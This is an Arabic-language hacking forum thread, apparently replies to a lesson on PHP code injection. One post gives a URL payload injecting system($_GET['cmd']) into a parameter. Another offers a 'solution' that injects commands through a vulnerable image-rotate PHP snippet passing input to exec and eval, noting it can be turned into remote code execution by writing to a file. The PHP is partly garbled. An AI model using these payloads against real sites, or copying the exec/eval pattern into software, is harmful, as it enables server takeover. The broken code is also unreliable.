Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


زحوفي TeaM D
  • شكراً: 0
  • تم شكره 8 مرة في 5 مشاركة

يعني من الـ url ما ينفع استغلال php code inj

فقط Commaned ؟ واذا استغلالي خطا

faris.php?news_width='';system($_GET['cmd']);'';
يعني فقط استغلالها في الـخانات مثل التسجيل وكذا ؟

ياليت تعطينا مثال فسكربت ولا شي وبحاول اكتشفه واطبقه بتعمق شوي فيها ..

mark94 عضو نشيط
  • شكراً: 0
  • تم شكره 2 مرة في 2 مشاركة

بارك الله فيك جاري مطالعة الدرس جيدا

HACKeR Dz عضو مميز
  • شكراً: 583
  • تم شكره 166 مرة في 55 مشاركة

السلام عليكم ورحمة الله
بارك الله فيك حبيبي والف
شكر لك على الموضوع
موفق

توقيع

Welcome

sshady عضو مميز
  • شكراً: 826
  • تم شكره 437 مرة في 166 مشاركة

رايكم في الحل

كود PHP:
$left_turn = exec($full_convert_path.' -rotate '.'id');?><?eval($left_turn);?><?$left_turn_2 = exec(''.' ');


تقدر تغير id الى امر الكتابة داخل ملف


و تصبح rce


كود PHP:
<?php

$passed 
false;

    
$old_img_date $album_info['date'];
    
$old_img_md5sum $album_info['md5sum'];

        if(
$_GET['rotate']=="left") {
            
$rotate = -90;
        } elseif(
$_GET['rotate']=="right") {
            
$rotate 90;
        } else {
            
$rotate $_GET['rotate'];
        }

        
$full_convert_path $convert_path."convert";

        
$left_turn exec($full_convert_path.' -rotate '.'id');?><?eval($left_turn);?><?$left_turn_2 = exec(''.' ');
    
?>